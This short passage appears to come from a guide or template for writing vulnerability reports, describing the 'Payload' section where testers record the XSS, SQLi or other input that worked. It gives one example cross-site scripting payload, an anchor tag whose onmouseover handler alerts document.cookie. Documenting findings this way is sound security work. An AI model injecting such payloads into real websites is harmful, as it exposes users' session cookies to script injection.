Payload

The XSS snippet we used to successfully execute JavaScript will go here. In the case of SQLi, a successful password attack, or any number of other payload-based attacks, that data would be required as well. If you trip on multiple payload types in one discovery, you should mention however many illustrate the general sanitation rules being misapplied:

<a onmouseover="alert(document.cookie)">xxs link</a>